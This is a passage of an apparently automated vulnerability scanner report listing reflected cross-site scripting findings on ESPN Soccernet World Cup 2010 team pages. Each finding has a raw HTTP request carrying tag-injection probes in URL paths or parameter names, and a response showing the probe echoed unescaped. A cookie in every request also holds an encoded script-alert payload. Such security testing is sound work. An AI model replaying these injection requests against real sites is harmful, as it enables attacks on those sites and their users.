HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:53 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 23:12:53 GMT Content-Length: 82238 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&92395"><a>78611054bea=1&_slug_=denmark&92395"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95388"><a>7a7e4d9961e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany95388"><a>7a7e4d9961e HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sat, 06 Nov 2010 23:14:42 GMT Content-Length: 80545 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&_slug_=germany95388"><a>7a7e4d9961e&topId=807747&linktext=Germany+finish+in+third+place"> ...[SNIP]...
5.102. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/481/germany
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6197"><a>19cb7e46d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany?c6197"><a>19cb7e46d2e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:44 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:13:43 GMT Content-Length: 80653 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&c6197"><a>19cb7e46d2e=1&_slug_=germany&c6197"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1efcc"><a>d926d468a72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal1efcc"><a>d926d468a72 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:53 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:31:53 GMT Content-Length: 81605 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&_slug_=portugal1efcc"><a>d926d468a72&topId=804233&linktext=Portugal+depart+after+Spain+defeat"> ...[SNIP]...
5.104. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/482/portugal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9668"><a>dbe5bd058c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal?c9668"><a>dbe5bd058c5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:23:26 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:23:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:28:26 GMT Content-Length: 81713 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&c9668"><a>dbe5bd058c5=1&_slug_=portugal&c9668"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94792"><a>24dd3ae9355 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea94792"><a>24dd3ae9355 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:05 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:05 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 23:33:05 GMT Content-Length: 81813 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&_slug_=north-korea94792"><a>24dd3ae9355&topId=803573&linktext=North+Korea+coach+proud+of+players"> ...[SNIP]...
5.106. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/4860/north-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85746"><a>c9e9c662c34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea?85746"><a>c9e9c662c34=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:23:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:23:57 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:28:57 GMT Content-Length: 81921 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&85746"><a>c9e9c662c34=1&_slug_=north-korea&85746"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced83"><a>be36cbbeb72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeriaced83"><a>be36cbbeb72 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:10 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:13:10 GMT Content-Length: 81717 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&_slug_=algeriaced83"><a>be36cbbeb72&topId=795940&linktext=Saifi+accused+of+slapping+journalist"> ...[SNIP]...
5.108. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/624/algeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><a>1a4281499ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeria?9d7f4"><a>1a4281499ae=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; 